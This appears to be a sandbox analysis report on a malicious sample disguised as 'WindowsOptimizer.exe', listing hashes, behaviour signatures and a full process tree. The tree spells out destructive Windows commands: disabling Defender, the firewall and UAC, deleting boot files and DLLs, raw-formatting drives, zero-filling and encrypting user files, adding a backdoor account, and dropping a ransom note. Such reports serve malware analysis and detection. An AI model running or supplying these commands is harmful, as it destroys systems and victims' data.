Analysis

  • max time kernel
    2s
  • max time network
    3s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-11-2024 21:27

General

  • Target

    WindowsOptimizer.exe

  • Size

    254KB

  • MD5

    5aaa262b518a3417e028e001152c9236

  • SHA1

    6d1cda51302d760509822b502a8f980537d17cb0

  • SHA256

    d4682419f76d71b863481d6e17ae0ed0cbbf06581aa2480ed304c66dd9072b5b

  • SHA512

    722d7c1a4f87c10f34e6500d1712414f159da8ca9cb02b0b9f44f8df717345cbff473cfe5c486837ad6c9e2487677c7e22c2974f7c36c320a83ffc16812ffbca

  • SSDEEP

    3072://w6PYqco8r88P7kHLWwZSO1qPZg6QpakmTjG0efuiWFExDYp1:1PYM8orWwgBeVuNpp1

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 5 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Enumerates connected drives 3 TTPs 3 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Modifies registry key 1 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe
    "C:\Users\Admin\AppData\Local\Temp\WindowsOptimizer.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Suspicious use of WriteProcessMemory
    PID:1480
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1204
      • C:\Windows\system32\reg.exe
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
          PID:4288
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4844
        • C:\Windows\system32\netsh.exe
          netsh advfirewall set allprofiles state off
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          PID:1172
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1484
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          3⤵
          • UAC bypass
          • Modifies registry key
          PID:3044
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c sc stop wuauserv
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3944
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:216
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c sc config wuauserv start=disabled
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2708
        • C:\Windows\system32\sc.exe
          sc config wuauserv start=disabled
          3⤵
          • Launches sc.exe
          PID:4452
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3304
        • C:\Windows\system32\reg.exe
          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
          3⤵
          • Modifies registry key
          PID:2416
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2036
        • C:\Windows\system32\reg.exe
          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
          3⤵
          • Disables RegEdit via registry modification
          • Modifies registry key
          PID:4056
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1980
        • C:\Windows\system32\reg.exe
          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
          3⤵
            PID:4872
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2148
          • C:\Windows\system32\reg.exe
            reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\RecoveryConsole" /v SecurityLevel /t REG_DWORD /d 0 /f
            3⤵
              PID:3528
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3588
            • C:\Windows\system32\bcdedit.exe
              bcdedit /set {default} recoveryenabled No
              3⤵
              • Modifies boot configuration data using bcdedit
              PID:2984
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:856
            • C:\Windows\system32\bcdedit.exe
              bcdedit /set {default} bootstatuspolicy ignoreallfailures
              3⤵
              • Modifies boot configuration data using bcdedit
              PID:3064
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\winload.exe
            2⤵
              PID:2516
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c net user TrojanUser0 ComplexPass123! /add
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2464
              • C:\Windows\system32\net.exe
                net user TrojanUser0 ComplexPass123! /add
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1764
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 user TrojanUser0 ComplexPass123! /add
                  4⤵
                    PID:3524
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Desktop" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1844
                • C:\Windows\system32\fsutil.exe
                  fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddConfirm.wm"
                  3⤵
                    PID:4996
                  • C:\Windows\system32\fsutil.exe
                    fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\AddDisconnect.cab"
                    3⤵
                      PID:2076
                    • C:\Windows\system32\fsutil.exe
                      fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteCompare.ods"
                      3⤵
                        PID:4072
                      • C:\Windows\system32\fsutil.exe
                        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\CompleteResize.mp3"
                        3⤵
                          PID:512
                        • C:\Windows\system32\fsutil.exe
                          fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\DenyOptimize.zip"
                          3⤵
                            PID:1588
                          • C:\Windows\system32\fsutil.exe
                            fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\FormatSubmit.ps1"
                            3⤵
                              PID:2136
                            • C:\Windows\system32\fsutil.exe
                              fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\GrantGroup.dib"
                              3⤵
                                PID:3268
                              • C:\Windows\system32\fsutil.exe
                                fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\HideMerge.odt"
                                3⤵
                                  PID:3264
                                • C:\Windows\system32\fsutil.exe
                                  fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinMount.m1v"
                                  3⤵
                                    PID:2592
                                  • C:\Windows\system32\fsutil.exe
                                    fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\JoinSelect.docx"
                                    3⤵
                                      PID:676
                                    • C:\Windows\system32\fsutil.exe
                                      fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\MergeSwitch.AAC"
                                      3⤵
                                        PID:3980
                                      • C:\Windows\system32\fsutil.exe
                                        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\Microsoft Edge.lnk"
                                        3⤵
                                          PID:3040
                                        • C:\Windows\system32\fsutil.exe
                                          fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\OptimizeGet.dwfx"
                                          3⤵
                                            PID:4316
                                          • C:\Windows\system32\fsutil.exe
                                            fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\PopInitialize.zip"
                                            3⤵
                                              PID:3060
                                            • C:\Windows\system32\fsutil.exe
                                              fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ReceiveConfirm.mpe"
                                              3⤵
                                                PID:1968
                                              • C:\Windows\system32\fsutil.exe
                                                fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RedoStop.asx"
                                                3⤵
                                                  PID:4348
                                                • C:\Windows\system32\fsutil.exe
                                                  fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\RegisterRepair.svg"
                                                  3⤵
                                                    PID:4420
                                                  • C:\Windows\system32\fsutil.exe
                                                    fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\ResolveStep.xsl"
                                                    3⤵
                                                      PID:4064
                                                    • C:\Windows\system32\fsutil.exe
                                                      fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SelectMove.MTS"
                                                      3⤵
                                                        PID:1220
                                                      • C:\Windows\system32\fsutil.exe
                                                        fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartOptimize.jpe"
                                                        3⤵
                                                          PID:3164
                                                        • C:\Windows\system32\fsutil.exe
                                                          fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StartRestore.001"
                                                          3⤵
                                                            PID:1280
                                                          • C:\Windows\system32\fsutil.exe
                                                            fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\StepSplit.wax"
                                                            3⤵
                                                              PID:2832
                                                            • C:\Windows\system32\fsutil.exe
                                                              fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\SwitchSave.search-ms"
                                                              3⤵
                                                                PID:1900
                                                              • C:\Windows\system32\fsutil.exe
                                                                fsutil file setZeroData offset=0 length=999999999 "C:\Users\Admin\Desktop\UnblockLock.mp4v"
                                                                3⤵
                                                                  PID:3436
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Desktop
                                                                2⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3628
                                                                • C:\Windows\system32\cipher.exe
                                                                  cipher /E /A /S:C:\Users\Admin\Desktop
                                                                  3⤵
                                                                    PID:4220
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\System32\*.dll
                                                                  2⤵
                                                                    PID:1760
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c del /F /Q C:\bootmgr
                                                                    2⤵
                                                                      PID:4588
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c bcdedit /delete {bootmgr} /f
                                                                      2⤵
                                                                        PID:3400
                                                                        • C:\Windows\system32\bcdedit.exe
                                                                          bcdedit /delete {bootmgr} /f
                                                                          3⤵
                                                                          • Modifies boot configuration data using bcdedit
                                                                          PID:3620
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c bcdedit /delete {default} /f
                                                                        2⤵
                                                                          PID:2320
                                                                          • C:\Windows\system32\bcdedit.exe
                                                                            bcdedit /delete {default} /f
                                                                            3⤵
                                                                            • Modifies boot configuration data using bcdedit
                                                                            PID:4144
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c mountvol X: /s
                                                                          2⤵
                                                                            PID:2564
                                                                            • C:\Windows\system32\mountvol.exe
                                                                              mountvol X: /s
                                                                              3⤵
                                                                                PID:2468
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c del /F /Q X:\EFI\Microsoft\Boot\*.*
                                                                              2⤵
                                                                                PID:2388
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c mountvol X: /d
                                                                                2⤵
                                                                                  PID:3352
                                                                                  • C:\Windows\system32\mountvol.exe
                                                                                    mountvol X: /d
                                                                                    3⤵
                                                                                    • Enumerates connected drives
                                                                                    PID:4972
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c format C: /fs:raw /q /y
                                                                                  2⤵
                                                                                    PID:3172
                                                                                    • C:\Windows\system32\format.com
                                                                                      format C: /fs:raw /q /y
                                                                                      3⤵
                                                                                        PID:920
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c format D: /fs:raw /q /y
                                                                                      2⤵
                                                                                        PID:4408
                                                                                        • C:\Windows\system32\format.com
                                                                                          format D: /fs:raw /q /y
                                                                                          3⤵
                                                                                          • Enumerates connected drives
                                                                                          PID:2336
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c format E: /fs:raw /q /y
                                                                                        2⤵
                                                                                          PID:1316
                                                                                          • C:\Windows\system32\format.com
                                                                                            format E: /fs:raw /q /y
                                                                                            3⤵
                                                                                            • Enumerates connected drives
                                                                                            PID:4016
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c bcdedit /delete {current} /f
                                                                                          2⤵
                                                                                            PID:792
                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                              bcdedit /delete {current} /f
                                                                                              3⤵
                                                                                              • Modifies boot configuration data using bcdedit
                                                                                              PID:4332
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                            2⤵
                                                                                              PID:216
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              cmd.exe /c for /r "C:\Users\Admin\Documents" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                              2⤵
                                                                                                PID:388
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                2⤵
                                                                                                  PID:3944
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  cmd.exe /c for /r "C:\Users\Admin\Pictures" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                  2⤵
                                                                                                    PID:2956
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                    2⤵
                                                                                                      PID:4452
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      cmd.exe /c for /r "C:\Users\Admin\Downloads" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                      2⤵
                                                                                                        PID:4268
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                        2⤵
                                                                                                          PID:2708
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          cmd.exe /c for /r "C:\Users\Admin\Music" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                          2⤵
                                                                                                            PID:2568
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                            2⤵
                                                                                                              PID:3484
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              cmd.exe /c for /r "C:\Users\Admin\Videos" %x in (*) do fsutil file setZeroData offset=0 length=999999999 "%x"
                                                                                                              2⤵
                                                                                                                PID:4924
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
                                                                                                                2⤵
                                                                                                                  PID:3304
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Desktop\RANSOM_NOTE.txt
                                                                                                                  2⤵
                                                                                                                    PID:4404
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
                                                                                                                    2⤵
                                                                                                                      PID:4744
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      cmd.exe /c cipher /E /A /S:C:\Users\Admin\Documents
                                                                                                                      2⤵
                                                                                                                        PID:4356
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt
                                                                                                                        2⤵
                                                                                                                          PID:2004
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Documents\RANSOM_NOTE.txt
                                                                                                                          2⤵
                                                                                                                            PID:2036
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Pictures
                                                                                                                            2⤵
                                                                                                                              PID:3504
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              cmd.exe /c cipher /E /A /S:C:\Users\Admin\Pictures
                                                                                                                              2⤵
                                                                                                                                PID:3712
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Pictures\RANSOM_NOTE.txt
                                                                                                                                2⤵
                                                                                                                                  PID:3564
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Pictures\RANSOM_NOTE.txt
                                                                                                                                  2⤵
                                                                                                                                    PID:884
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Downloads
                                                                                                                                    2⤵
                                                                                                                                      PID:1960
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      cmd.exe /c cipher /E /A /S:C:\Users\Admin\Downloads
                                                                                                                                      2⤵
                                                                                                                                        PID:3032
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Downloads\RANSOM_NOTE.txt
                                                                                                                                        2⤵
                                                                                                                                          PID:1980
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Downloads\RANSOM_NOTE.txt
                                                                                                                                          2⤵
                                                                                                                                            PID:3720
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Music
                                                                                                                                            2⤵
                                                                                                                                              PID:3528
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              cmd.exe /c cipher /E /A /S:C:\Users\Admin\Music
                                                                                                                                              2⤵
                                                                                                                                                PID:4944
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Music\RANSOM_NOTE.txt
                                                                                                                                                2⤵
                                                                                                                                                  PID:2148
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Music\RANSOM_NOTE.txt
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5052
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Videos
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1228
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      cmd.exe /c cipher /E /A /S:C:\Users\Admin\Videos
                                                                                                                                                      2⤵
                                                                                                                                                        PID:688
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Videos\RANSOM_NOTE.txt
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4212
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Videos\RANSOM_NOTE.txt
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1660
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\AppData
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3064
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              cmd.exe /c cipher /E /A /S:C:\Users\Admin\AppData
                                                                                                                                                              2⤵
                                                                                                                                                                PID:3580
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\AppData\RANSOM_NOTE.txt
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:856
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\AppData\RANSOM_NOTE.txt
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:5056
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\Users\Admin\Favorites
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1400
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      cmd.exe /c cipher /E /A /S:C:\Users\Admin\Favorites
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1464
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Favorites\RANSOM_NOTE.txt
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2812
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          cmd.exe /c echo YOUR FILES HAVE BEEN ENCRYPTED! Send 5 BTC to unlock. Your personal files, photos, and memories are gone forever unless you pay. > C:\Users\Admin\Favorites\RANSOM_NOTE.txt
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4764
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c cipher /E /A /S:C:\
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:212
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              cmd.exe /c cipher /E /A /S:C:\
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2292
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c cipher /E /A /S:D:\
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:812
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  cmd.exe /c cipher /E /A /S:D:\
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:4576
                                                                                                                                                                                • C:\Windows\system32\efsui.exe
                                                                                                                                                                                  efsui.exe /efs /keybackup
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                  PID:4232

                                                                                                                                                                                Network

                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                Downloads